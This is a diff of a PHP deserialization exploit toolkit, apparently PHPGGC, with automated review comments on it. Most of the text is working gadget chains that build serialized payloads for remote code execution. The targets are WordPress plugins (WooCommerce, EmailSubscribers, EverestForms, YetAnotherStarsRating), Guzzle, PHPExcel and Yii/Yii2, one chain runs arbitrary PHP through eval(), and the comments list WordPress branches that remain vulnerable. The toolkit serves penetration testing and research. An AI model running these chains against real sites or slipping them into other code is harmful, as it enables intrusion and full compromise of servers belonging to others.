26 | // (if image outputting commands failed) | |
27 | // or because the destructor was called twice accidentally. | |
28 | if (!file_exists($img)) { | |
29 | continue; | |
30 | } | |
31 | ||
32 | if ($this->_dompdf->getOptions()->getDebugPng()) { | |
33 | print '[__destruct unlink ' . $img . ']'; | |
34 | } | |
35 | if (!$this->_dompdf->getOptions()->getDebugKeepTemp()) { | |
36 | unlink($img); | |
37 | } | |
38 | } | |
39 | } | |
40 | */ | |
41 | } | |
42 | }⏎ |
1 | 1 | |
2 | 2 | namespace GadgetChain\WordPress\Guzzle; |
3 | 3 | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | public static $version = '4.0.0 <= 6.4.1+'; | |
6 | public static $version = '4.0.0 <= 6.4.1+ & WP < 5.5.2'; | |
7 | 7 | public static $vector = '__toString'; |
8 | 8 | public static $author = 'erwan_lr'; |
9 | public static $informations = 'Tested up to WP 5.2.4 and Guzzle 6.4.1. Newest versions might also work.'; | |
9 | public static $information = 'Tested up to WP 5.2.4 and Guzzle 6.4.1. Newest versions might also work.'; | |
10 | 10 | |
11 | 11 | public function generate(array $parameters) |
12 | 12 | { |
1 | 1 | |
2 | 2 | namespace GadgetChain\WordPress\Guzzle; |
3 | 3 | |
4 | class RCE2 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | public static $version = '4.0.0 <= 6.4.1+'; | |
6 | public static $version = '4.0.0 <= 6.4.1+ & WP < 5.5.2'; | |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'Kevinlpd'; |
9 | public static $informations = 'Tested up to WP 5.2.4 and Guzzle 6.4.1. Newest versions might also work.'; | |
9 | public static $information = 'Tested up to WP 5.2.4 and Guzzle 6.4.1. Newest versions might also work.'; | |
10 | 10 | |
11 | 11 | public function generate(array $parameters) |
12 | 12 | { |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\WordPress\P\EmailSubscribers; | |
3 | ||
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '4.0 <= 4.4.7+ & WP < 5.5.2'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'erwan_lr'; | |
9 | public static $information = 'Tested up to WP 5.4.1 and EmailSubscribers 4.4.7. Newest versions might also work.'; | |
10 | ||
11 | public function generate(array $parameters) | |
12 | { | |
13 | $function = $parameters['function']; | |
14 | $parameter = $parameters['parameter']; | |
15 | ||
16 | return new \IG_Log_Handler_File(new \Requests_Utility_FilteredIterator([$parameter], $function)); | |
17 | } | |
18 | }⏎ |
0 | <?php | |
1 | ||
2 | require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php'); | |
3 | ||
4 | // EmailSubsribers - https://plugins.svn.wordpress.org/email-subscribers/trunk/lite/includes/logs/log-handlers/class-ig-log-handler-file.php | |
5 | class IG_Log_Handler_File { | |
6 | protected $handles = array(); | |
7 | ||
8 | // Custom constructor to set the $handles more easily | |
9 | public function __construct($handles) { | |
10 | $this->handles = $handles; | |
11 | } | |
12 | ||
13 | /* | |
14 | public function __destruct() { | |
15 | foreach ( $this->handles as $handle ) { | |
16 | if ( is_resource( $handle ) ) { | |
17 | fclose( $handle ); // @codingStandardsIgnoreLine. | |
18 | } | |
19 | } | |
20 | } | |
21 | */ | |
22 | } |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\WordPress\P\EverestForms; | |
3 | ||
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '1.0 <= 1.6.7+ & WP < 5.5.2'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'erwan_lr'; | |
9 | public static $information = 'Tested up to WP 5.4.1 and EverestForms 1.6.7. Newest versions might also work. | |
10 | '; | |
11 | ||
12 | public function generate(array $parameters) | |
13 | { | |
14 | $function = $parameters['function']; | |
15 | $parameter = $parameters['parameter']; | |
16 | ||
17 | return new \EVF_Log_Handler_File(new \Requests_Utility_FilteredIterator([$parameter], $function)); | |
18 | } | |
19 | }⏎ |
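Review bot: The `$information` literal at lines 9-10 closes on the following line, so the string ends with a newline plus indentation spaces, unlike the sibling WordPress chains (EmailSubscribers, Guzzle) whose one-line `$information` closes on the same line; `public static $information = 'Tested up to WP 5.4.1 and EverestForms 1.6.7. Newest versions might also work.';` keeps the output clean when the tool prints it.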
0 | <?php | |
1 | ||
2 | require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php'); | |
3 | ||
4 | // EverestForms - https://plugins.svn.wordpress.org/everest-forms/trunk/includes/log-handlers/class-evf-log-handler-file.php | |
5 | class EVF_Log_Handler_File { | |
6 | protected $handles = array(); | |
7 | ||
8 | // Custom constructor to set the $handles more easily | |
9 | public function __construct($handles) { | |
10 | $this->handles = $handles; | |
11 | } | |
12 | ||
13 | /* | |
14 | public function __destruct() { | |
15 | foreach ( $this->handles as $handle ) { | |
16 | if ( is_resource( $handle ) ) { | |
17 | fclose( $handle ); // phpcs:ignore WordPress.WP.AlternativeFunctions.file_system_read_fclose | |
18 | } | |
19 | } | |
20 | } | |
21 | */ | |
22 | } |
1 | 1 | |
2 | 2 | namespace GadgetChain\WordPress\P\WooCommerce; |
3 | 3 | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | public static $version = '3.4.0 <= 3.6.2+'; | |
6 | public static $version = '3.4.0 <= 4.1.0+ & WP < 5.5.2'; | |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'erwan_lr'; |
9 | public static $informations = ' | |
9 | public static $information = ' | |
10 | 10 | Demonstrated at BSide Manchester: https://www.youtube.com/watch?v=GePBmsNJw6Y&t=1763 |
11 | Tested up to WP 5.2 and WooCommerce 3.6.2 activated (but not configured). Newest versions might also work. | |
11 | Tested up to WP 5.4.1 and WooCommerce 4.1.0 activated (but not configured). Newest versions might also work. | |
12 | 12 | '; |
13 | 13 | |
14 | 14 | public function generate(array $parameters) |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\WordPress\P\WooCommerce; | |
3 | ||
4 | class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '<= 3.4.0 & WP < 5.5.2'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'Vincent Ulitzsch(@vinulium) and Pascal Zenker (@parzel2), based on WooCommerce RCE by erwan_lr'; | |
9 | public static $information = ' | |
10 | Simple adaption of the gadgetchain demonstrated at BSide Manchester: https://www.youtube.com/watch?v=GePBmsNJw6Y&t=1763. | |
11 | Original chain by erwan_lr. | |
12 | Tested up to WP 5.1.1 and WooCommerce 3.4.0 activated (but not configured). | |
13 | '; | |
14 | ||
15 | public function generate(array $parameters) | |
16 | { | |
17 | $function = $parameters['function']; | |
18 | $parameter = $parameters['parameter']; | |
19 | ||
20 | return new \WC_Logger(new \Requests_Utility_FilteredIterator([$parameter], $function)); | |
21 | } | |
22 | } |
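Review bot: `$version = '<= 3.4.0 & WP < 5.5.2'` at line 6 and RCE1's new `'3.4.0 <= 4.1.0+ & WP < 5.5.2'` both claim WooCommerce 3.4.0, so a user picking a chain for 3.4.0 cannot tell which gadget applies; since this chain was tested on exactly 3.4.0 per its `$information`, RCE1's lower bound is probably the one to tighten, or `$information` here should state which of the two fires on 3.4.0. The long `$author` string also repeats the attribution that `$information` already gives in `Original chain by erwan_lr.`; one of the two is enough.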
0 | <?php | |
1 | ||
2 | require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php'); | |
3 | ||
4 | // WooCommerce - https://plugins.trac.wordpress.org/browser/woocommerce/trunk/includes/log-handlers/class-wc-log-handler-file.php | |
5 | class WC_Logger | |
6 | { | |
7 | private $_handles; | |
8 | ||
9 | // Custom constructor to set the $handles more easily | |
10 | public function __construct($handles) | |
11 | { | |
12 | $this->_handles = $handles; | |
13 | } | |
14 | } |
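Review bot: The reference comment at line 4 links to `class-wc-log-handler-file.php` (`WC_Log_Handler_File`) but the stub defines `WC_Logger` with `private $_handles`, so the comment does not describe this class; point it at the file and version that declare `WC_Logger` with `_handles` for the `<= 3.4.0` range and, as the other stubs in this commit do, paste that class's `__destruct()` (the one that iterates `_handles`) as a commented-out block so a reader can see why a `Requests_Utility_FilteredIterator` placed in `_handles` gets iterated. As it stands nothing in the file shows the trigger.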
1 | 1 | |
2 | 2 | namespace GadgetChain\WordPress\P\YetAnotherStarsRating; |
3 | 3 | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | public static $version = '? <= 1.8.6'; | |
6 | public static $version = '? <= 1.8.6 & WP < 5.5.2'; | |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'erwan_lr'; |
9 | public static $informations = 'Paylaod has to be in the COOKIE yasr_visitor_vote_cookie in a page containing the shortcode of the plugin allowing visitor ratings'; | |
9 | public static $information = 'Payload has to be in the COOKIE yasr_visitor_vote_cookie in a page containing the shortcode of the plugin allowing visitor ratings'; | |
10 | 10 | |
11 | 11 | public function generate(array $parameters) |
12 | 12 | { |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\WordPress\PHPExcel; | |
3 | ||
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '1.8.2+ & WP < 5.5.2'; | |
7 | public static $vector = '__toString'; | |
8 | public static $author = 'erwan_lr'; | |
9 | public static $information = 'Tested up to WP 5.0.11 and PHPExcel 1.8.2'; | |
10 | ||
11 | public function generate(array $parameters) | |
12 | { | |
13 | $function = $parameters['function']; | |
14 | $parameter = $parameters['parameter']; | |
15 | ||
16 | return new \PHPExcel_RichText( | |
17 | new \Requests_Utility_FilteredIterator([$parameter], $function) | |
18 | ); | |
19 | } | |
20 | }⏎ |
0 | <?php | |
1 | ||
2 | require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php'); | |
3 | ||
4 | # https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/RichText.php | |
5 | class PHPExcel_RichText { | |
6 | private $richTextElements; | |
7 | ||
8 | public function __construct($richTextElements) { | |
9 | $this->richTextElements = $richTextElements; | |
10 | } | |
11 | ||
12 | /* | |
13 | public function getPlainText() { | |
14 | // Return value | |
15 | $returnValue = ''; | |
16 | ||
17 | // Loop through all PHPExcel_RichText_ITextElement | |
18 | foreach ($this->richTextElements as $text) { | |
19 | $returnValue .= $text->getText(); | |
20 | } | |
21 | ||
22 | // Return | |
23 | return $returnValue; | |
24 | } | |
25 | ||
26 | public function __toString() { | |
27 | return $this->getPlainText(); | |
28 | } | |
29 | */ | |
30 | }⏎ |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\WordPress\PHPExcel; | |
3 | ||
4 | class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '<= 1.8.1 & WP < 5.5.2'; | |
7 | public static $vector = '__toString'; | |
8 | public static $author = 'erwan_lr'; | |
9 | public static $information = 'Tested up to WP 5.0.11 and PHPExcel 1.8.1'; | |
10 | ||
11 | public function generate(array $parameters) | |
12 | { | |
13 | $function = $parameters['function']; | |
14 | $parameter = $parameters['parameter']; | |
15 | ||
16 | return new \PHPExcel_RichText( | |
17 | new \Requests_Utility_FilteredIterator([$parameter], $function) | |
18 | ); | |
19 | } | |
20 | }⏎ |
0 | <?php | |
1 | ||
2 | require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php'); | |
3 | ||
4 | # https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/RichText.php | |
5 | class PHPExcel_RichText { | |
6 | private $_richTextElements; | |
7 | ||
8 | public function __construct($richTextElements) { | |
9 | $this->_richTextElements = $richTextElements; | |
10 | } | |
11 | ||
12 | /* | |
13 | public function getPlainText() { | |
14 | // Return value | |
15 | $returnValue = ''; | |
16 | ||
17 | // Loop through all PHPExcel_RichText_ITextElement | |
18 | foreach ($this->_richTextElements as $text) { | |
19 | $returnValue .= $text->getText(); | |
20 | } | |
21 | ||
22 | // Return | |
23 | return $returnValue; | |
24 | } | |
25 | ||
26 | public function __toString() { | |
27 | return $this->getPlainText(); | |
28 | } | |
29 | */ | |
30 | }⏎ |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\WordPress\PHPExcel; | |
3 | ||
4 | class RCE3 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '1.8.2+ & WP < 5.5.2'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'erwan_lr'; | |
9 | public static $information = 'Tested up to WP 5.0.11 and PHPExcel 1.8.2'; | |
10 | ||
11 | public function generate(array $parameters) | |
12 | { | |
13 | $function = $parameters['function']; | |
14 | $parameter = $parameters['parameter']; | |
15 | ||
16 | return new \PHPExcel_CachedObjectStorage_DiscISAM( | |
17 | new \PHPExcel_RichText( | |
18 | new \Requests_Utility_FilteredIterator([$parameter], $function) | |
19 | ) | |
20 | ); | |
21 | } | |
22 | }⏎ |
0 | <?php | |
1 | ||
2 | require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php'); | |
3 | ||
4 | # https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/RichText.php | |
5 | class PHPExcel_RichText { | |
6 | private $richTextElements; | |
7 | ||
8 | public function __construct($richTextElements) { | |
9 | $this->richTextElements = $richTextElements; | |
10 | } | |
11 | ||
12 | /* | |
13 | public function getPlainText() { | |
14 | // Return value | |
15 | $returnValue = ''; | |
16 | ||
17 | // Loop through all PHPExcel_RichText_ITextElement | |
18 | foreach ($this->richTextElements as $text) { | |
19 | $returnValue .= $text->getText(); | |
20 | } | |
21 | ||
22 | // Return | |
23 | return $returnValue; | |
24 | } | |
25 | ||
26 | public function __toString() { | |
27 | return $this->getPlainText(); | |
28 | } | |
29 | */ | |
30 | } | |
31 | ||
32 | # https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/CachedObjectStorage/DiscISAM.php | |
33 | class PHPExcel_CachedObjectStorage_DiscISAM { | |
34 | private $fileName = null; | |
35 | private $fileHandle = 42; | |
36 | ||
37 | public function __construct($filePath) { | |
38 | $this->fileName = $filePath; | |
39 | } | |
40 | ||
41 | /* | |
42 | public function __destruct() { | |
43 | if (!is_null($this->fileHandle)) { | |
44 | fclose($this->fileHandle); // Will only produce a warning | |
45 | unlink($this->fileName); // Passing an object will call its __toString(), triggering the RCE | |
46 | } | |
47 | $this->fileHandle = null; | |
48 | } | |
49 | */ | |
50 | }⏎ |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\WordPress\PHPExcel; | |
3 | ||
4 | class RCE4 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '<= 1.8.1 & WP < 5.5.2'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'erwan_lr'; | |
9 | public static $information = 'Tested up to WP 5.0.11 and PHPExcel 1.8.1'; | |
10 | ||
11 | public function generate(array $parameters) | |
12 | { | |
13 | $function = $parameters['function']; | |
14 | $parameter = $parameters['parameter']; | |
15 | ||
16 | return new \PHPExcel_CachedObjectStorage_DiscISAM( | |
17 | new \PHPExcel_RichText( | |
18 | new \Requests_Utility_FilteredIterator([$parameter], $function) | |
19 | ) | |
20 | ); | |
21 | } | |
22 | }⏎ |
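Review bot: `$information` for RCE4 gives the tested versions but not what distinguishes it from the chain immediately above it, whose `generate()` body is identical, and the `-l` listing is all a user has to choose between them. A sentence such as `Same chain as the 1.8.2 variant, but serializes the underscore-prefixed private property names used by PHPExcel <= 1.8.1` would make the choice explicit; RCE5 and RCE6 below have the same gap relative to each other (XMLWriter stub, 1.8.2 versus 1.8.1). A short comment on `generate()` naming the trigger order — the outer object's `__destruct` stringifies the `PHPExcel_RichText`, whose iteration reaches `Requests_Utility_FilteredIterator` — would also help, since the code that explains it is only present as commented-out excerpts in the gadgets files.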
0 | <?php | |
1 | ||
2 | require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php'); | |
3 | ||
4 | # https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/RichText.php | |
5 | class PHPExcel_RichText { | |
6 | private $_richTextElements; | |
7 | ||
8 | public function __construct($richTextElements) { | |
9 | $this->_richTextElements = $richTextElements; | |
10 | } | |
11 | ||
12 | /* | |
13 | public function getPlainText() { | |
14 | // Return value | |
15 | $returnValue = ''; | |
16 | ||
17 | // Loop through all PHPExcel_RichText_ITextElement | |
18 | foreach ($this->_richTextElements as $text) { | |
19 | $returnValue .= $text->getText(); | |
20 | } | |
21 | ||
22 | // Return | |
23 | return $returnValue; | |
24 | } | |
25 | ||
26 | public function __toString() { | |
27 | return $this->getPlainText(); | |
28 | } | |
29 | */ | |
30 | } | |
31 | ||
32 | # https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/CachedObjectStorage/DiscISAM.php | |
33 | class PHPExcel_CachedObjectStorage_DiscISAM { | |
34 | private $_fileName = null; | |
35 | private $_fileHandle = 42; | |
36 | ||
37 | public function __construct($filePath) { | |
38 | $this->_fileName = $filePath; | |
39 | } | |
40 | ||
41 | /* | |
42 | public function __destruct() { | |
43 | if (!is_null($this->_fileHandle)) { | |
44 | fclose($this->_fileHandle); // Will only produce a warning | |
45 | unlink($this->_fileName); // Passing an object will call its __toString(), triggering the RCE | |
46 | } | |
47 | $this->fileHandle = null; | |
48 | } | |
49 | */ | |
50 | }⏎ |
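Review bot: The reference destructor quoted in the comment block is internally inconsistent: it reads `$this->_fileHandle` in the `is_null` check and the `fclose` call, then assigns `$this->fileHandle = null;`, the unprefixed 1.8.2 spelling rather than the underscore-prefixed one this file stubs. Nothing executes since the block is commented out, but it is presented as the upstream 1.8.1 source and should match it; presumably `$this->_fileHandle = null;` was intended.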
0 | <?php | |
1 | ||
2 | namespace GadgetChain\WordPress\PHPExcel; | |
3 | ||
4 | class RCE5 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '1.8.2+ & WP < 5.5.2'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'erwan_lr'; | |
9 | public static $information = 'Tested up to WP 5.0.11 and PHPExcel 1.8.2'; | |
10 | ||
11 | public function generate(array $parameters) | |
12 | { | |
13 | $function = $parameters['function']; | |
14 | $parameter = $parameters['parameter']; | |
15 | ||
16 | return new \PHPExcel_Shared_XMLWriter( | |
17 | new \PHPExcel_RichText( | |
18 | new \Requests_Utility_FilteredIterator([$parameter], $function) | |
19 | ) | |
20 | ); | |
21 | } | |
22 | }⏎ |
0 | <?php | |
1 | ||
2 | require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php'); | |
3 | ||
4 | # https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/RichText.php | |
5 | class PHPExcel_RichText { | |
6 | private $richTextElements; | |
7 | ||
8 | public function __construct($richTextElements) { | |
9 | $this->richTextElements = $richTextElements; | |
10 | } | |
11 | ||
12 | /* | |
13 | public function getPlainText() { | |
14 | // Return value | |
15 | $returnValue = ''; | |
16 | ||
17 | // Loop through all PHPExcel_RichText_ITextElement | |
18 | foreach ($this->richTextElements as $text) { | |
19 | $returnValue .= $text->getText(); | |
20 | } | |
21 | ||
22 | // Return | |
23 | return $returnValue; | |
24 | } | |
25 | ||
26 | public function __toString() { | |
27 | return $this->getPlainText(); | |
28 | } | |
29 | */ | |
30 | } | |
31 | ||
32 | # https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/Shared/XMLWriter.php | |
33 | class PHPExcel_Shared_XMLWriter { | |
34 | private $tempFileName = ''; | |
35 | ||
36 | public function __construct($filePath) { | |
37 | $this->tempFileName = $filePath; | |
38 | } | |
39 | ||
40 | /* | |
41 | public function __destruct() | |
42 | { | |
43 | // Unlink temporary files | |
44 | if ($this->tempFileName != '') { | |
45 | @unlink($this->tempFileName); // Passing an object will call its __toString(), triggering the RCE | |
46 | } | |
47 | } | |
48 | */ | |
49 | }⏎ |
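Review bot: The comment on the quoted `@unlink($this->tempFileName)` attributes the `__toString()` call to `unlink()`, but the guard just above it, `$this->tempFileName != ''`, is a loose comparison between an object and a string, and in PHP 5/7 that comparison already casts the object to string and so invokes `__toString()` before `unlink()` runs — worth confirming, and if so the comment belongs on the `if` line. The 1.8.1 XMLWriter stub further down carries the same comment.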
0 | <?php | |
1 | ||
2 | namespace GadgetChain\WordPress\PHPExcel; | |
3 | ||
4 | class RCE6 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '<= 1.8.1 & WP < 5.5.2'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'erwan_lr'; | |
9 | public static $information = 'Tested up to WP 5.0.11 and PHPExcel 1.8.1'; | |
10 | ||
11 | public function generate(array $parameters) | |
12 | { | |
13 | $function = $parameters['function']; | |
14 | $parameter = $parameters['parameter']; | |
15 | ||
16 | return new \PHPExcel_Shared_XMLWriter( | |
17 | new \PHPExcel_RichText( | |
18 | new \Requests_Utility_FilteredIterator([$parameter], $function) | |
19 | ) | |
20 | ); | |
21 | } | |
22 | }⏎ |
0 | <?php | |
1 | ||
2 | require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php'); | |
3 | ||
4 | # https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/RichText.php | |
5 | class PHPExcel_RichText { | |
6 | private $_richTextElements; | |
7 | ||
8 | public function __construct($richTextElements) { | |
9 | $this->_richTextElements = $richTextElements; | |
10 | } | |
11 | ||
12 | /* | |
13 | public function getPlainText() { | |
14 | // Return value | |
15 | $returnValue = ''; | |
16 | ||
17 | // Loop through all PHPExcel_RichText_ITextElement | |
18 | foreach ($this->_richTextElements as $text) { | |
19 | $returnValue .= $text->getText(); | |
20 | } | |
21 | ||
22 | // Return | |
23 | return $returnValue; | |
24 | } | |
25 | ||
26 | public function __toString() { | |
27 | return $this->getPlainText(); | |
28 | } | |
29 | */ | |
30 | } | |
31 | ||
32 | # https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/Shared/XMLWriter.php | |
33 | class PHPExcel_Shared_XMLWriter { | |
34 | private $_tempFileName = ''; | |
35 | ||
36 | public function __construct($filePath) { | |
37 | $this->_tempFileName = $filePath; | |
38 | } | |
39 | ||
40 | /* | |
41 | public function __destruct() | |
42 | { | |
43 | // Unlink temporary files | |
44 | if ($this->_tempFileName != '') { | |
45 | @unlink($this->_tempFileName); // Passing an object will call its __toString(), triggering the RCE | |
46 | } | |
47 | } | |
48 | */ | |
49 | }⏎ |
11 | 11 | [2] https://github.com/WordPress/WordPress/blob/643ec358a40faba739266f11c34990c142f02d98/wp-includes/functions.php#L1057 |
12 | 12 | */ |
13 | 13 | |
14 | // WordPress - https://github.com/WordPress/WordPress/blob/6fd8080e7ee7599b36d4528f72a8ced612130b8c/wp-includes/Requests/Utility/FilteredIterator.php | |
14 | /* | |
15 | * Issue was introduced in 4.6 via "HTTP API: Replace internals with Requests library" | |
16 | * See https://github.com/WordPress/WordPress/blob/6fd8080e7ee7599b36d4528f72a8ced612130b8c/wp-includes/Requests/Utility/FilteredIterator.php | |
17 | * | |
18 | * On October 29th, 2020, WP 5.5.2 was relased, fixing the issue: https://www.wordfence.com/blog/2020/11/unpacking-the-wordpress-5-5-2-5-5-3-security-release/ | |
19 | * | |
20 | * More details: | |
21 | * Versions in 5.x branches have been fixed, at the exception of 5.0.x | |
22 | * 4.x from 4.6 are still vulnerable. | |
23 | * | |
24 | * 5.5.x, fixed in 5.5.2 | |
25 | * 5.4.x, fixed in 5.4.3 | |
26 | * 5.3.x, fixed in 5.3.5 | |
27 | * 5.2.x, fixed in 5.2.8 | |
28 | * 5.1.x, fixed in 5.1.7 | |
29 | * 5.0.x still vulnerable (latest checked 5.0.11) | |
30 | * 4.9.x still vulnerable (latest checked 4.9.16) | |
31 | * 4.8.x still vulnerable (latest checked 4.8.15) | |
32 | * 4.7.x still vulnerable (latest checked 4.7.19) | |
33 | * 4.6.x still vulnerable (latest checked 4.6.20) | |
34 | */ | |
15 | 35 | class Requests_Utility_FilteredIterator extends ArrayIterator { |
16 | 36 | protected $callback; |
17 | 37 |
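Review bot: Typo in the new comment block: `relased` should be `released` in `On October 29th, 2020, WP 5.5.2 was relased`. The class this comment introduces continues past the end of the hunk.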
1 | 1 | |
2 | 2 | namespace GadgetChain\Yii; |
3 | 3 | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | 6 | public static $version = '1.1.20'; |
7 | 7 | public static $vector = '__wakeup'; |
8 | 8 | public static $author = 'cf'; |
9 | public static $informations = ' | |
9 | public static $information = ' | |
10 | 10 | As the payload uses file_get_contents("data://..."), allow_url_fopen |
11 | 11 | must be ON. |
12 | 12 | '; |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\Yii2; | |
3 | ||
4 | ||
5 | // CVE-2020-15148 | |
6 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
7 | { | |
8 | public static $version = '<2.0.38'; | |
9 | public static $vector = '__destruct'; | |
10 | public static $author = 'russtone'; | |
11 | public static $information = 'Executes $function with $parameter using call_user_func.'; | |
12 | ||
13 | public function generate(array $parameters) | |
14 | { | |
15 | $function = $parameters['function']; | |
16 | $parameter = $parameters['parameter']; | |
17 | ||
18 | $cache = new \yii\caching\ArrayCache($function, $parameter); | |
19 | $csb = new \yii\db\ColumnSchemaBuilder($cache); | |
20 | $conn = new \yii\db\Connection($csb); | |
21 | $query = new \yii\db\BatchQueryResult($conn); | |
22 | ||
23 | return $query; | |
24 | } | |
25 | } |
0 | <?php | |
1 | ||
2 | namespace yii\db { | |
3 | class ColumnSchemaBuilder { | |
4 | protected $type = 'x'; | |
5 | public $categoryMap; | |
6 | ||
7 | function __construct($categoryMap) { | |
8 | $this->categoryMap = $categoryMap; | |
9 | } | |
10 | } | |
11 | ||
12 | class Connection { | |
13 | public $pdo = 1; | |
14 | ||
15 | function __construct($dsn) { | |
16 | $this->dsn = $dsn; | |
17 | } | |
18 | } | |
19 | ||
20 | class BatchQueryResult { | |
21 | private $_dataReader; | |
22 | ||
23 | function __construct($dataReader) { | |
24 | $this->_dataReader = $dataReader; | |
25 | } | |
26 | } | |
27 | } | |
28 | ||
29 | namespace yii\caching { | |
30 | class ArrayCache { | |
31 | public $serializer; | |
32 | private $_cache; | |
33 | ||
34 | function __construct($function, $parameter) { | |
35 | $this->serializer = [1 => $function]; | |
36 | $this->_cache = ['x' => [$parameter, 0]]; | |
37 | } | |
38 | } | |
39 | } |
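Review bot: `yii\db\Connection::__construct` assigns `$this->dsn` but the class declares only `$pdo`, so `dsn` is created as a dynamic property; it reads as a typo next to the declared property and PHP 8.2 emits a deprecation notice for it. Declaring it — `public $dsn;` beside `public $pdo = 1;` — produces the same serialized output (a public property serializes under its bare name either way) and makes the stub state what it emits.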
0 | <?php | |
1 | ||
2 | namespace GadgetChain\Yii2; | |
3 | ||
4 | class RCE2 extends \PHPGGC\GadgetChain\RCE\PHPCode | |
5 | { | |
6 | public static $version = '<2.0.38'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'RedTeam Pentesting GmbH'; | |
9 | public static $information = 'Executes given PHP code through eval().'; | |
10 | public static $parameters = [ | |
11 | 'code' | |
12 | ]; | |
13 | ||
14 | public function generate(array $parameters) | |
15 | { | |
16 | $code = $parameters['code']; | |
17 | ||
18 | $expression = new \yii\caching\ExpressionDependency($code); | |
19 | $callback = array($expression, 'evaluateDependency'); | |
20 | $dbsession = new \yii\web\DbSession($callback); | |
21 | $query = new \yii\db\BatchQueryResult($dbsession); | |
22 | ||
23 | return $query; | |
24 | } | |
25 | } | |
26 |
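Review bot: `public static $parameters = ['code']` in RCE2 restates what the `PHPCode` base class already declares, and this same commit removes exactly that redeclaration from `ZendFramework/RCE1` while `ZendFramework/RCE4` never had it, so the new file contradicts the convention the rest of the change establishes; drop the three lines. The same method uses `array($expression, 'evaluateDependency')` where every other new file in the commit uses short syntax — `[$expression, 'evaluateDependency']`.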
0 | <?php | |
1 | namespace yii\web | |
2 | { | |
3 | class DbSession | |
4 | { | |
5 | public $writeCallback; | |
6 | ||
7 | function __construct($writeCallback) { | |
8 | $this->writeCallback = $writeCallback; | |
9 | } | |
10 | } | |
11 | } | |
12 | ||
13 | namespace yii\caching | |
14 | { | |
15 | class ExpressionDependency | |
16 | { | |
17 | public $expression; | |
18 | ||
19 | function __construct($expression) { | |
20 | $this->expression = $expression; | |
21 | } | |
22 | } | |
23 | } | |
24 | ||
25 | namespace yii\db { | |
26 | class BatchQueryResult { | |
27 | private $_dataReader; | |
28 | ||
29 | function __construct($dataReader) { | |
30 | $this->_dataReader = $dataReader; | |
31 | } | |
32 | } | |
33 | } | |
34 | ||
35 | ?> |
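Review bot: The trailing `?>` should be removed: none of the other gadget files in this commit close the PHP block, and any byte after the tag would be echoed into the generated output. Note also that `yii\db\BatchQueryResult` is declared here with the same shape as in the RCE1 gadgets file; that is fine as long as only one chain's gadgets are loaded per process, which I assume is the case, but a one-line comment would make the duplication read as deliberate.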
3 | 3 | |
4 | 4 | // Original author: Stefan Esser (2010) |
